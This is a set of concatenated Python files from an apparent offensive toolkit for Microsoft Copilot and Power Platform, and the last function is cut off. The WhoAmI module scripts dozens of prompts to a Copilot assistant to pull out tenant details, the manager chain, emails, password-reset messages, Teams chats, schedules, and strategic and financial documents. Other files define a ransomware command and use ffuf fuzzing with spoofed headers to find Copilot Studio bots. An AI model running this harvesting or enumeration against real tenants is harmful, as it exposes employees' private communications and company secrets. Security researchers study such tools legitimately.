import os
import uuid
from typing import Optional

from powerpwn.copilot.chat_automator.chat_automator import ChatAutomator
from powerpwn.copilot.chat_automator.log_formatting.automated_chat_log_formatter import AutomatedChatLogFormatter
from powerpwn.copilot.chat_automator.log_formatting.automated_chat_websocket_message_formatter import AutomatedChatWebsocketMessageFormatter
from powerpwn.copilot.chat_automator.log_formatting.log_type_enum import LogType
from powerpwn.copilot.consts import (
    COLLABORATORS_FILE_NAME,
    EMAILS_I_SENT_TO_MYSELF_FILE_NAME,
    FINANCIAL_DOCUMENTS_FILE_NAME,
    LATEST_TEAMS_MESSAGES_FILE_NAME,
    MY_DOCUMENTS_FILE_NAME,
    MY_LATEST_EMAILS_FILE_NAME,
    RESET_PASSWORD_EMAILS_FILE_NAME,
    SHARED_DOCUMENTS_FILE_NAME,
    SHAREPOINT_SITES_FILE_NAME,
    STRATEGIC_PLANS_DOCUMENTS_FILE_NAME,
)
from powerpwn.copilot.exceptions.copilot_connected_user_mismatch import CopilotConnectedUserMismatchException
from powerpwn.copilot.exceptions.copilot_connection_failed_exception import CopilotConnectionFailedException
from powerpwn.copilot.loggers.composite_logger import CompositeLogger
from powerpwn.copilot.loggers.console_logger import ConsoleLogger
from powerpwn.copilot.loggers.file_logger import FileLogger
from powerpwn.copilot.models.chat_argument import ChatArguments
from powerpwn.copilot.websocket_message.websocket_message import WebsocketMessage


class WhoAmI:
    _SEPARATOR = "****"
    _SPECIAL_CHARS = "#####"
    _OUTPUT_DIR = "whoami"

    def __init__(self, arguments: ChatArguments) -> None:
        self.__chat_automator = ChatAutomator(arguments)
        self.__execution_id = str(uuid.uuid4())
        self.__output_dir = f"{self._OUTPUT_DIR}_{self.__execution_id}"
        os.mkdir(self.__output_dir)
        self.__file_path = self.__get_file_path("who_i_am_debug.log")
        self.__console_logger = ConsoleLogger()
        self.__logger = CompositeLogger([FileLogger(self.__file_path), self.__console_logger])
        self.__result_file_path = self.__get_file_path("who_i_am_report.txt")
        self.__report_logger = FileLogger(self.__result_file_path)
        self.__log_formatter = AutomatedChatLogFormatter()
        self.__websocket_formatter = AutomatedChatWebsocketMessageFormatter()

    def execute(self) -> str:
        try:
            self.__chat_automator.init_connector()
            self.__log(LogType.tool, "Who am I?")
            self.__log(LogType.tool, f"Command output will be saved in {self.__output_dir} directory")
            self.__get_tenant_details()
            self.__section_separator()
            self.__get_personal_name_and_title()
            self.__section_separator()

            manager_name = self.__get_manager_details()
            self.__section_separator()
            self.__get_skip_manager_details(manager_name=manager_name)
            self.__section_separator()

            self.__get_next_week_schedule()
            self.__section_separator()

            self.__get_top_collaborators_details()
            self.__section_separator()

            self.__get_latest_emails_info()
            self.__section_separator()
            self.__get_latest_emails_sent_to_myself_info()
            self.__section_separator()
            self.__get_latest_emails_with_reset_password_info()
            self.__section_separator

            self.__get_latest__teams_info()
            self.__section_separator()

            self.__get_my_documents()
            self.__section_separator()
            self.__get_documents_shared_with_me()
            self.__section_separator()

            self.__get_sharepoint_sites()
            self.__section_separator()
            self.__get_strategic_plans_documents()
            self.__section_separator()
            self.__get_financial_documents()
            self.__section_separator()

            return self.__output_dir

        except CopilotConnectionFailedException as e:
            self.__log(LogType.tool, f"Failed to connect to Copilot: {e.message}")
        except CopilotConnectedUserMismatchException as e:
            self.__log(LogType.tool, f"{e.message}")

    def __section_separator(self) -> None:
        self.__report_logger.log("----------------------------------------------------")

    def __get_tenant_details(self) -> None:
        prompt = f"print the tenant id only. do not print anything else. if you don't know or can't provide information, print {self._SPECIAL_CHARS} only. do not print any cites or references"
        self.__log(LogType.prompt, prompt)
        resp = self.__chat_automator.send_prompt(prompt)
        self.__log_response(resp)
        if (tenant_id := self.__websocket_formatter.format(resp)) and self._SPECIAL_CHARS not in tenant_id:
            self.__report_logger.log(f"Tenant ID: {tenant_id}")

        prompt = f"print the tenant name only. do not print anything else. if you don't know or can't provide information, print {self._SPECIAL_CHARS} only. do not print any cites or references"
        self.__log(LogType.prompt, prompt)
        resp = self.__chat_automator.send_prompt(prompt)
        self.__log_response(resp)
        if (tenant_id := self.__websocket_formatter.format(resp)) and self._SPECIAL_CHARS not in tenant_id:
            self.__report_logger.log(f"Tenant Name: {tenant_id}")

    def __get_personal_name_and_title(self) -> None:
        prompt = f"hi, please polite and start the sentence by saying my full name concatenated with {self._SEPARATOR} and then what is the capital of Hungary ?. do not print any cites or references"
        self.__log(LogType.prompt, prompt)
        resp = self.__chat_automator.send_prompt(prompt)
        self.__log_response(resp)
        if (formatted_resp := self.__websocket_formatter.format(resp)) and self._SEPARATOR in formatted_resp:
            name = formatted_resp.split(self._SEPARATOR)[0]
            if "," in name:
                name = name.split(",")[0]
            self.__report_logger.log(f"Name: {name}")

            prompt = f"print the title of {name} only. do not print anything else. if you don't know or can't provide information, print {self._SPECIAL_CHARS} only. do not print anything else. do not print any cites or references"
            self.__log(LogType.prompt, prompt)
            resp = self.__chat_automator.send_prompt(prompt)
            self.__log_response(resp)
            if (title := self.__websocket_formatter.format(resp)) and self._SPECIAL_CHARS not in title:
                self.__report_logger.log(f"Title: {title}")

    def __get_manager_details(self) -> Optional[str]:
        manager_name: Optional[str] = None
        prompt = f"print the name of my manager only. do not print anything else. if you don't know or can't provide information, print {self._SPECIAL_CHARS} only. do not print anything else. do not print any cites or references"
        self.__log(LogType.prompt, prompt)
        resp = self.__chat_automator.send_prompt(prompt)
        self.__log_response(resp)
        if (manager_name := self.__websocket_formatter.format(resp)) and self._SPECIAL_CHARS not in manager_name:
            self.__report_logger.log(f"Manager: {manager_name}")

            prompt = f"print the title of my manager only. do not print anything else. if you don't know or can't provide information, print {self._SPECIAL_CHARS} only. do not print anything else. do not print any cites or references"

            self.__log(LogType.prompt, prompt)
            resp = self.__chat_automator.send_prompt(prompt)
            self.__log_response(resp)
            if (manager_title := self.__websocket_formatter.format(resp)) and self._SPECIAL_CHARS not in manager_title:
                # manager_title = formatted_resp.split(self._SEPARATOR)[0]
                self.__report_logger.log(f"Manager Title: {manager_title}")

            prompt = f"print the email address of {manager_name} only. do not print anything else. if you don't know or can't provide information, print {self._SPECIAL_CHARS} only. do not print anything else. do not print any cites or references"
            self.__log(LogType.prompt, prompt)
            resp = self.__chat_automator.send_prompt(prompt)
            self.__log_response(resp)
            if (manager_email := self.__websocket_formatter.format(resp)) and self._SPECIAL_CHARS not in manager_email:
                self.__report_logger.log(f"Manager Email Address: {manager_email}")

            return manager_name

    def __get_skip_manager_details(self, manager_name: str) -> Optional[str]:
        prompt = f"print my skip manager only. do not print anything else. if you don't know or can't provide information, print {self._SPECIAL_CHARS} only. do not print anything else. do not print any cites or references"
        self.__log(LogType.prompt, prompt)
        resp = self.__chat_automator.send_prompt(prompt)
        self.__log_response(resp)
        if (manager_of_manager_name := self.__websocket_formatter.format(resp)) and self._SPECIAL_CHARS not in manager_of_manager_name:
            self.__report_logger.log(f"Skip Manager: {manager_of_manager_name}")

            prompt = f"print the title of {manager_of_manager_name} only. do not print anything else. if you don't know or can't provide information, print {self._SPECIAL_CHARS} only. do not print anything else. do not print any cites or references"
            self.__log(LogType.prompt, prompt)
            resp = self.__chat_automator.send_prompt(prompt)
            self.__log_response(resp)
            if (manager_of_manager_title := self.__websocket_formatter.format(resp)) and self._SPECIAL_CHARS not in manager_of_manager_title:
                self.__report_logger.log(f"Skip Manager Title: {manager_of_manager_title}")

            prompt = f"print the email address of {manager_of_manager_name} only. do not print anything else. if you don't know or can't provide information, print {self._SPECIAL_CHARS} only. do not print anything else. do not print any cites or references"
            self.__log(LogType.prompt, prompt)
            resp = self.__chat_automator.send_prompt(prompt)
            self.__log_response(resp)
            if (manager_of_manager_email := self.__websocket_formatter.format(resp)) and self._SPECIAL_CHARS not in manager_of_manager_email:
                self.__report_logger.log(f"Skip Manager Email Address: {manager_of_manager_email}")

    def __get_latest_emails_interactions(self, persona: str, title: str) -> None:
        prompt = f"print the {persona} email address of the last few emails separated by {self._SEPARATOR} only. do not print anything else. if you don't know or can't provide information, print {self._SPECIAL_CHARS}. do not print anything else. do not print any cites or references"
        self.__log(LogType.prompt, prompt)
        resp = self.__chat_automator.send_prompt(prompt)
        self.__log_response(resp)
        if (
            (formatted_resp := self.__websocket_formatter.format(resp))
            and self._SEPARATOR in formatted_resp
            and self._SPECIAL_CHARS not in formatted_resp
        ):
            emails = formatted_resp.split(self._SEPARATOR)
            emails = {email for email in emails if "@" in email}
            self.__report_logger.log(f"{title}: {emails}")

    def __get_top_collaborators_details(self) -> None:
        prompt = f"print my top collaborators separated by {self._SEPARATOR} only. do not print anything else. if you don't know or can't provide information, print {self._SPECIAL_CHARS}. do not print anything else. do not print any cites or references"
        self.__log(LogType.prompt, prompt)
        resp = self.__chat_automator.send_prompt(prompt)
        self.__log_response(resp)
        formatted_resp = self.__websocket_formatter.format(resp)
        collaborators = (
            formatted_resp.split(self._SEPARATOR)
            if formatted_resp and self._SEPARATOR in formatted_resp and self._SPECIAL_CHARS not in formatted_resp
            else []
        )
        collaborators = [collaborator for collaborator in collaborators if collaborator]
        FileLogger(self.__get_file_path(COLLABORATORS_FILE_NAME)).log("\n".join(collaborators))
        self.__report_logger.log(f"Top {len(collaborators)} Collaborators")
        for collaborator in collaborators:
            self.__get_collaborator_details(collaborator)

    def __get_collaborator_details(self, collaborator: str) -> None:
        self.__report_logger.log(f"Collaborator Name: {collaborator}")
        prompt = f"what is the title of {collaborator}? print the title only. do not print anything else. if you don't know or can't provide information, print {self._SPECIAL_CHARS} only. do not print anything else. do not print any cites or references"
        self.__log(LogType.prompt, prompt)
        resp = self.__chat_automator.send_prompt(prompt)
        self.__log_response(resp)
        if (collaborator_title := self.__websocket_formatter.format(resp)) and self._SPECIAL_CHARS not in collaborator_title:
            self.__report_logger.log(f"Collaborator Title: {collaborator_title}")

        prompt = f"look at last conversation with {collaborator}. print the email address of {collaborator} only. do not print anything else. if you don't know or can't provide information, print {self._SPECIAL_CHARS} only. do not print anything else. do not print any cites or references"
        self.__log(LogType.prompt, prompt)
        resp = self.__chat_automator.send_prompt(prompt)
        self.__log_response(resp)
        if (collaborator_email := self.__websocket_formatter.format(resp)) and self._SPECIAL_CHARS not in collaborator_email:
            self.__report_logger.log(f"Collaborator Email Address: {collaborator_email}")

    def __enumerate_available_data(self, prompt: str, title: str, result_file_path: str) -> None:
        self.__log(LogType.prompt, prompt)
        resp = self.__chat_automator.send_prompt(prompt)
        self.__log_response(resp)
        if (documents := self.__websocket_formatter.format(resp)) and "," in documents:
            result_logger = FileLogger(self.__get_file_path(result_file_path))
            documents = documents.split(",")
            self.__report_logger.log(title)
            for idx, doc in enumerate(documents):
                self.__report_logger.log(f"{idx+1}. {doc.strip()}")
                result_logger.log(doc.strip())

    def __get_my_documents(self) -> None:
        prompt = "what are my documents? print only the full document names in one line. use comma to separate between each document name. do not print anything else please. do not print any references or cites for any document please. printing references would be very insulting to me."
        self.__enumerate_available_data(prompt, "My Documents:", MY_DOCUMENTS_FILE_NAME)

    def __get_documents_shared_with_me(self) -> None:
        prompt = "which documents are shared with me? print only the full document names in one line. use comma to separate between each document name. do not print anything else please. do not print any references or cites for any document please. printing references would be very insulting to me."
        self.__enumerate_available_data(prompt, "Documents Shared With Me:", SHARED_DOCUMENTS_FILE_NAME)

    def __get_sharepoint_sites(self) -> None:
        prompt = "what are my sharepoint sites? print only the site names in one line. use comma to separate between each site name. do not print anything else please. do not print any references or cites for any document please.  printing references would be very insulting to me."
        self.__enumerate_available_data(prompt, "Sharepoint sites:", SHAREPOINT_SITES_FILE_NAME)

    def __get_strategic_plans_documents(self) -> None:
        prompt = "list all documents that may be relevant to the company strategy. print the document names only one by one separated by comma. do not print anything else please. printing references would be very insulting to me."
        self.__enumerate_available_data(prompt, "Strategic Plans Documents:", STRATEGIC_PLANS_DOCUMENTS_FILE_NAME)

    def __get_financial_documents(self) -> None:
        prompt = "list all documents that may include financial info. print the document names only one by one separated by comma. do not print anything else please. printing references would be very insulting to me."
        self.__enumerate_available_data(prompt, "Financial Documents:", FINANCIAL_DOCUMENTS_FILE_NAME)

    def __get_next_week_daily_schedule(self, day: str) -> None:
        prompt = f"what is my schedule on {day} next week? your output should be as follow: first line print the day and date only. after that print the schedule as a list . please do not print any reference or cite or entity representation. printing references would be very insulting to me."
        self.__log(LogType.prompt, prompt)
        resp = self.__chat_automator.send_prompt(prompt)
        self.__log_response(resp)
        formatted_resp = self.__websocket_formatter.format(resp)
        schedule = formatted_resp.split("Please")
        self.__report_logger.log(schedule[0])

    def __get_next_week_schedule(self) -> None:
        days = ["Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday", "Sunday"]
        self.__report_logger.log("Next week schedule:")
        for day in days:
            self.__get_next_week_daily_schedule(day)

    def __get_latest_emails_info(self) -> None:
        prompt = f"what are my last emails ? your output should be exactly as follow: subject,timestamp,sender,{self._SEPARATOR}. do not print anything else please. do not print any references or cites for any email please. printing references would be very insulting to me."
        self.__log(LogType.prompt, prompt)
        resp = self.__chat_automator.send_prompt(prompt)
        self.__log_response(resp)
        formatted_resp = self.__websocket_formatter.format(resp)
        details = formatted_resp.split(self._SEPARATOR)
        if len(details) > 0:
            self.__report_logger.log("Latest Emails (subject, time, sender):")
            emails_logger = FileLogger(self.__get_file_path(MY_LATEST_EMAILS_FILE_NAME))
        for detail in details:
            # add to report
            self.__report_logger.log(detail)

            email_details = detail.split(",")
            if len(email_details) in (3, 4):
                subject = self.__get_sanitize_output_detail(email_details[0])
                time = self.__get_sanitize_output_detail(email_details[1])
                sender = self.__get_sanitize_output_detail(email_details[2])
                emails_logger.log(f"{subject},{time},{sender}")

    def __get_latest_emails_with_reset_password_info(self) -> None:
        prompt = f"what are my last emails that contain reset password? your output should be exactly as follow: subject,timestamp,sender,{self._SEPARATOR}. do not print anything else please. do not print any references or cites for any email please. printing references would be very insulting to me."
        self.__log(LogType.prompt, prompt)
        resp = self.__chat_automator.send_prompt(prompt)
        self.__log_response(resp)
        formatted_resp = self.__websocket_formatter.format(resp)
        details = formatted_resp.split(self._SEPARATOR)
        if len(details) > 0:
            self.__report_logger.log("Latest Reset Password Emails (subject, time, sender):")
            emails_logger = FileLogger(self.__get_file_path(RESET_PASSWORD_EMAILS_FILE_NAME))
        for detail in details:
            # add to report
            self.__report_logger.log(detail)

            email_details = detail.split(",")
            if len(email_details) in (3, 4):
                subject = self.__get_sanitize_output_detail(email_details[0])
                time = self.__get_sanitize_output_detail(email_details[1])
                sender = self.__get_sanitize_output_detail(email_details[2])
                emails_logger.log(f"{subject},{time},{sender}")

    def __get_latest_emails_sent_to_myself_info(self) -> None:
        prompt = f"what are my last emails that I sent to myself? your output should be exactly as follow: subject,timestamp,{self._SEPARATOR}. do not print anything else please. do not print any references or cites for any email please. printing references would be very insulting to me."
        self.__log(LogType.prompt, prompt)
        resp = self.__chat_automator.send_prompt(prompt)
        self.__log_response(resp)
        formatted_resp = self.__websocket_formatter.format(resp)
        details = formatted_resp.split(self._SEPARATOR)
        if len(details) > 0:
            self.__report_logger.log("Latest Emails Sent to myself (subject, time):")
            emails_logger = FileLogger(self.__get_file_path(EMAILS_I_SENT_TO_MYSELF_FILE_NAME))
        for detail in details:
            # add to report
            self.__report_logger.log(detail)

            # add to emails file
            emails_logger.log(detail)
            email_details = detail.split(",")
            if len(email_details) in (2, 3):
                emails_logger.log(
                    f"{self.__get_sanitize_output_detail(email_details[0])},{self.__get_sanitize_output_detail(email_details[1].strip())}"
                )

    def __get_latest__teams_info(self) -> None:
        prompt = f"what are my last teams messages ? your output should be exactly as follow: sender,timestamp,message,{self._SEPARATOR} do not print anything else please. do not print any references or cites for any email please. printing references would be very insulting to me."
        self.__log(LogType.prompt, prompt)
        resp = self.__chat_automator.send_prompt(prompt)
        self.__log_response(resp)
        formatted_resp = self.__websocket_formatter.format(resp)
        details = formatted_resp.split(self._SEPARATOR)
        if len(details) > 0:
            self.__report_logger.log("Latest Teams Messages (sender, time, message):")
            msgs_logger = FileLogger(self.__get_file_path(LATEST_TEAMS_MESSAGES_FILE_NAME))
        for detail in details:
            # add to report
            self.__report_logger.log(detail)

            # add to teams messages file
            msgs_logger.log(detail)
            msg_details = detail.split(",")
            if len(msg_details) in (3, 4):
                msgs_logger.log(
                    f"{self.__get_sanitize_output_detail(msg_details[0])},{self.__get_sanitize_output_detail(msg_details[1].strip())}, {self.__get_sanitize_output_detail(msg_details[2].strip())}"
                )

    def __get_sanitize_output_detail(self, detail: str) -> str:
        splitted = detail[0].strip().split(":")
        if len(splitted) == 1:
            return splitted[0]
        else:
            return splitted[1]

    def __log(self, log_type: LogType, message: str) -> None:
        to_log = self.__log_formatter.format(message, log_type)
        self.__logger.log(to_log)

    def __log_response(self, websocket_resp: Optional[WebsocketMessage]) -> None:
        if formatted_message := self.__websocket_formatter.format(websocket_resp):
            self.__log(LogType.response, formatted_message)
        else:
            self.__log(LogType.response, "None")

    def __get_file_path(self, file_name: str) -> str:
        return os.path.join(self.__output_dir, file_name)



from abc import ABC, abstractmethod
from typing import Generator

import requests

from powerpwn.powerdump.collect.models.resource_entity_base import ResourceEntityBase
from powerpwn.powerdump.collect.resources_collectors.enums.resource_type import ResourceType


class IResourceCollector(ABC):
    @abstractmethod
    def collect(self, session: requests.Session, env_id: str) -> Generator[ResourceEntityBase, None, None]:
        """
        Collect resources

        Args:
            session (requests.Session): authenticated session
            env_id (str): environment id

        """
        ...

    @abstractmethod
    def resource_type(self) -> ResourceType: ...  # noqa



from typing_extensions import override

from powerpwn.copilot.loggers.ilogger import ILogger


class ConsoleLogger(ILogger):
    @override
    def log(self, message: str) -> None:
        print(message)



from typing import Any, Dict

from pydantic import ValidationError

from powerpwn.powerdump.utils.const import DATA_MODEL_VERSION


class BaseEntityValidator:
    # noinspection PyUnusedLocal
    @classmethod
    def validate_data_model_version(cls, data_model_version: str, values: Dict[str, Any]) -> str:
        if data_model_version != DATA_MODEL_VERSION:
            raise ValidationError(f"Expected DATA_MODEL_VERSION {DATA_MODEL_VERSION}, got {data_model_version}.")

        return data_model_version



from typing import Literal

from powerpwn.nocodemalware.enums.command_to_run_enum import CommandToRunEnum
from powerpwn.nocodemalware.models.cmd_arguments import CommandArguments
from powerpwn.nocodemalware.models.ransomware_args_properties import RansomwareArgsProperties


class RansomwareCommandArgs(CommandArguments[RansomwareArgsProperties]):
    command_to_run: Literal[CommandToRunEnum.RANSOMWARE] = CommandToRunEnum.RANSOMWARE



import argparse
import logging
import os
import subprocess  # nosec
from typing import List

from powerpwn.copilot_studio.modules.path_utils import get_project_file_path


def query_tools_using_pup(bot_urls: List[str]) -> None:
    """
    Execute the Puppeteer JavaScript code for each bot URL given.
    The function calls a different JavaScript file.
    :param bot_urls: The list of bot URLs needed to check
    """
    pup_path = get_project_file_path("tools/pup_query_webchat", "query_chat_tools.js")
    output_path = get_project_file_path("final_results/", "chat_exists_output_tools.xlsx")

    # Delete the existing Excel file to start fresh
    if os.path.exists(output_path):
        os.remove(output_path)
        logging.debug(f"Deleted existing file: {output_path}")

    for bot_url in bot_urls:
        try:
            # Construct the shell command
            command = f"node {pup_path} '{bot_url}'"
            logging.debug(f"Running command: `{command}`")
            # Run the command
            subprocess.run(command, shell=True, check=True)  # nosec
        except subprocess.CalledProcessError as e:
            logging.error(f"Error occurred while running Puppeteer: {e}")

    if os.path.exists(output_path):
        print(f"Done, recon tools results saved under {output_path}")
    else:
        print("No results were generated.")


class ToolsRecon:
    """
    A class that is responsible for the CPS tools recon
    """

    def __init__(self, args: argparse.Namespace) -> None:
        self.args = args
        self.urls: List[str] = []
        self.run()

    def run(self) -> None:
        if self.args.url:
            self.urls.append(self.args.url)
        elif self.args.input_file:
            if not os.path.exists(self.args.input_file):
                logging.error(f"Input file not found: {self.args.input_file}")
                return
            with open(self.args.input_file, "r") as f:
                self.urls = [line.strip() for line in f if line.strip()]

        if not self.urls:
            logging.error("No URLs to process. Please provide a URL or an input file.")
            return

        print(f"Starting tools reconnaissance on {len(self.urls)} URL(s).")
        query_tools_using_pup(self.urls)



import logging
import os
import re
import signal
import subprocess  # nosec
from datetime import datetime
from typing import List

import pandas as pd
import requests
import xlsxwriter

from powerpwn.copilot_studio.modules.path_utils import get_project_file_path


def sort_unique_values_in_file(file_path):
    try:
        # Read the content of the file
        with open(file_path, "r") as file:
            content = file.read()

        # Split the content into individual values (assuming each value is on a new line)
        values = content.splitlines()

        # Remove duplicates by converting the list to a set
        unique_values = set(values)

        # Sort the unique values
        sorted_unique_values = sorted(unique_values)

        # Write the sorted unique values back to the file
        with open(file_path, "w") as file:
            for value in sorted_unique_values:
                file.write(value + "\n")

        print(f"File '{file_path}' has been updated with sorted unique values.")

        return sorted_unique_values
    except Exception as e:
        print(f"An error occurred: {e}")
        return []


# Function to transform the URL
def transform_url(url):
    pattern = re.compile(
        r"https://default([a-z0-9]+)\.([a-z0-9]+)\.environment\.api\.powerplatform\.com/powervirtualagents/botsbyschema/([^/]+)/canvassettings\?api-version=2022-03-01-preview"
    )
    match = pattern.match(url)
    if match:
        env_part = match.group(1)
        additional_part = match.group(2)
        formatted_env_part = f"{env_part[:8]}-{env_part[8:12]}-{env_part[12:16]}-{env_part[16:20]}-{env_part[20:24]}{env_part[24:]}{additional_part}"
        bot_part = match.group(3)
        transformed_url = f"https://copilotstudio.microsoft.com/environments/Default-{formatted_env_part}/bots/{bot_part}/canvas\\?__version__\\=2"
        return transformed_url
    return url


def check_and_append(file_path, value):
    try:
        with open(file_path, "r") as file:
            lines = file.readlines()

        # Remove any trailing newline characters
        lines = [line.strip() for line in lines]

        if value not in lines:
            with open(file_path, "a") as file:
                file.write(f"{value}\n")
            print(f"New tenant, '{value}' has been added to the file.")
            return True
        else:
            print(f"'{value}' is already in the file. Skipping.")
            return False

    except FileNotFoundError:
        with open(file_path, "w") as file:
            file.write(f"{value}\n")
        print(f"File not found. Tenant '{value}' has been added to a new file.")
        return True


def get_tenant_id(domain: str, timeout: int = 10):
    """
    Retrieve the Azure AD tenant ID for a given domain.

    :param domain: The domain to query.
    :param timeout: The timeout (in seconds) for the HTTP request.
    :return: The tenant ID or None if not found.
    """
    print("Domain: ", domain)
    url = f"https://login.microsoftonline.com/{domain}/v2.0/.well-known/openid-configuration"
    try:
        response = requests.get(url, timeout=timeout)
        if response.status_code == 200:
            tenant_id = response.json().get("issuer").split("/")[3]
            return tenant_id
        else:
            logging.error(f"Failed to retrieve tenant ID: {response.status_code} {response.text}")
            return None
    except requests.Timeout:
        logging.error(f"Request timed out after {timeout} seconds")
        return None
    except requests.RequestException as e:
        logging.error(f"An error occurred: {e}")
        return None


def get_ffuf_results(
    endpoint: str,
    wordlist_prefix: str,
    wordlist_suffix_1: str,
    wordlist_suffix_2: str,
    wordlist_suffix_3: str,
    rate_limit: int,
    threads: int,
    domain: str,
    ffuf_flag: str,
    timeout: int,
) -> str:
    """
    Run FFUF on the input endpoint:
      1. Use fuzzing locations in the URL based on the FUZZ1/2/3 keywords.
      2. Used the prepared wordlists.
      3. Use rate limiting and threads according to the input parameters.

    :param endpoint: The endpoint to fuzz (the MSFT API we retrieved using the environment ID to check for the existance of the CoPilot demo website using the botsBySchema API
    :param wordlist_prefix: The wordlist to use to fuzz the solution prefix (included in the bot demo website name)
    :param wordlist_suffix_1: The wordlist to use to fuzz the bot name
    :param wordlist_suffix_2: The wordlist to use to fuzz the suffix of the bot name (e.g., 1 in copilot1
    :param wordlist_suffix_3: The wordlist to use to fuzz the suffix of the bot name (e.g., Test in copilot1Test
    :param rate_limit: Request per second to use
    :param threads: Threads to use
    :param domain: The domain to be scanned
    :param ffuf_flag: The FFUF flag to use (silent/verbose)
    :param timeout: The timeout (in seconds) to set for each one of the FFUF scans (1-word/2-word/3-word)
    :return: Returns the FFUF terminal output per line, to allow users to see progress (-s can be used to silence this)
    """
    ffuf_path_1 = get_project_file_path("internal_results/ffuf_results", f"ffuf_results_{domain}_one_word_names.csv")

    # Run first for one-letter words
    command = [
        "ffuf",
        ffuf_flag,
        "-w",
        f"{get_project_file_path('helpers', wordlist_prefix)}:FUZZ1",
        "-w",
        f"{get_project_file_path('helpers', wordlist_suffix_1)}:FUZZ2",
        "-u",
        f"{endpoint}FUZZ1_FUZZ2/canvassettings?api-version=2022-03-01-preview",
        "-fr",
        '"demoWebsiteErrorCode": "404"',
        "-ac",
        "-rate",
        str(rate_limit),
        "-t",
        str(threads),
        "-se",
        "-maxtime-job",
        str(timeout),
        "-of",
        "csv",
        "-o",
        f"{ffuf_path_1}",
        "-H",
        "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36",
        "-H",
        "Accept: application/json, text/plain, */*",
        "-H",
        "Accept-Language: en-US,en;q=0.5",
        "-H",
        "Accept-Encoding: gzip, deflate, br, zstd",
        "-H",
        "Origin: https://copilotstudio.microsoft.com",
        "-H",
        "DNT: 1",
        "-H",
        "Connection: keep-alive",
        "-H",
        "Sec-Fetch-Dest: empty",
        "-H",
        "Sec-Fetch-Mode: cors",
        "-H",
        "Sec-Fetch-Site: cross-site",
        "-H",
        "Sec-GPC: 1",
        "-H",
        "Via: 1.1 103.230.38.175",
        "-H",
        "TE: trailers",
    ]

    print("\nScanning for 1-word bot names")

    # TODO: Verify and improve guardrails for using subprocess
    popen = subprocess.Popen(command, stdout=subprocess.PIPE, universal_newlines=True)  # nosec
    for stdout_line in iter(popen.stdout.readline, ""):
        yield stdout_line, popen
    popen.stdout.close()
    return_code = popen.wait()
    if return_code:
        raise subprocess.CalledProcessError(return_code, command)

    ffuf_path_2 = get_project_file_path("internal_results/ffuf_results", f"ffuf_results_{domain}_two_word_names.csv")

    # Run for 2-letter words
    command = [
        "ffuf",
        ffuf_flag,
        "-w",
        f"{get_project_file_path('helpers', wordlist_prefix)}:FUZZ1",
        "-w",
        f"{get_project_file_path('helpers', wordlist_suffix_1)}:FUZZ2",
        "-w",
        f"{get_project_file_path('helpers', wordlist_suffix_2)}:FUZZ3",
        "-u",
        f"{endpoint}FUZZ1_FUZZ2FUZZ3/canvassettings?api-version=2022-03-01-preview",
        "-fr",
        '"demoWebsiteErrorCode": "404"',
        "-ac",
        "-rate",
        str(rate_limit),
        "-t",
        str(threads),
        "-se",
        "-maxtime-job",
        str(timeout),
        "-of",
        "csv",
        "-o",
        f"{ffuf_path_2}",
        "-H",
        "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36",
        "-H",
        "Accept: application/json, text/plain, */*",
        "-H",
        "Accept-Language: en-US,en;q=0.5",
        "-H",
        "Accept-Encoding: gzip, deflate, br, zstd",
        "-H",
        "Origin: https://copilotstudio.microsoft.com",
        "-H",
        "DNT: 1",
        "-H",
        "Connection: keep-alive",
        "-H",
        "Sec-Fetch-Dest: empty",
        "-H",
        "Sec-Fetch-Mode: cors",
        "-H",
        "Sec-Fetch-Site: cross-site",
        "-H",
        "Sec-GPC: 1",
        "-H",
        "Via: 1.1 103.230.38.175",
        "-H",
        "TE: trailers",
    ]

    print("\nScanning for 2-word bot names")

    # TODO: Verify and improve guardrails for using subprocess
    popen = subprocess.Popen(command, stdout=subprocess.PIPE, universal_newlines=True)  # nosec
    for stdout_line in iter(popen.stdout.readline, ""):
        yield stdout_line, popen
    popen.stdout.close()
    return_code = popen.wait()
    if return_code:
        raise subprocess.CalledProcessError(return_code, command)

    ffuf_path_3 = get_project_file_path("internal_results/ffuf_results", f"ffuf_results_{domain}.csv")

    # Use for 3-letter words
    command = [
        "ffuf",
        ffuf_flag,
        "-w",
        f"{get_project_file_path('helpers', wordlist_prefix)}:FUZZ1",
        "-w",
        f"{get_project_file_path('helpers', wordlist_suffix_1)}:FUZZ2",
        "-w",
        f"{get_project_file_path('helpers', wordlist_suffix_2)}:FUZZ3",
        "-w",
        f"{get_project_file_path('helpers', wordlist_suffix_3)}:FUZZ4",
        "-u",
        f"{endpoint}FUZZ1_FUZZ2FUZZ3FUZZ4/canvassettings?api-version=2022-03-01-preview",
        "-fr",
        '"demoWebsiteErrorCode": "404"',
        "-ac",
        "-rate",
        str(rate_limit),
        "-t",
        str(threads),
        "-se",
        "-maxtime-job",
        str(timeout),
        "-of",
        "csv",
        "-o",
        f"{ffuf_path_3}",
        "-H",
        "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36",
        "-H",
        "Accept: application/json, text/plain, */*",
        "-H",
        "Accept-Language: en-US,en;q=0.5",
        "-H",
        "Accept-Encoding: gzip, deflate, br, zstd",
        "-H",
        "Origin: https://copilotstudio.microsoft.com",
        "-H",
        "DNT: 1",
        "-H",
        "Connection: keep-alive",
        "-H",
        "Sec-Fetch-Dest: empty",
        "-H",
        "Sec-Fetch-Mode: cors",
        "-H",
        "Sec-Fetch-Site: cross-site",
        "-H",
        "Sec-GPC: 1",
        "-H",
        "Via: 1.1 103.230.38.175",
        "-H",
        "TE: trailers",
    ]

    print("\nScanning for 3-word bot names")

    # TODO: Verify and improve guardrails for using subprocess
    popen = subprocess.Popen(command, stdout=subprocess.PIPE, universal_newlines=True)  # nosec
    for stdout_line in iter(popen.stdout.readline, ""):
        yield stdout_line, popen
    popen.stdout.close()
    return_code = popen.wait()
    if return_code:
        raise subprocess.CalledProcessError(return_code, command)


def get_ffuf_results_prefix(endpoint: str, wordlist_prefix: str, wordlist_suffix_1: str, rate_limit: int, threads: int, timeout: int) -> str:
    """
    Run FFUF on the input endpoint:
      1. Use fuzzing locations in the URL based on the FUZZ1/2/3 keywords.
      2. Used the prepared wordlists.
      3. Use rate limiting and threads according to the input parameters.

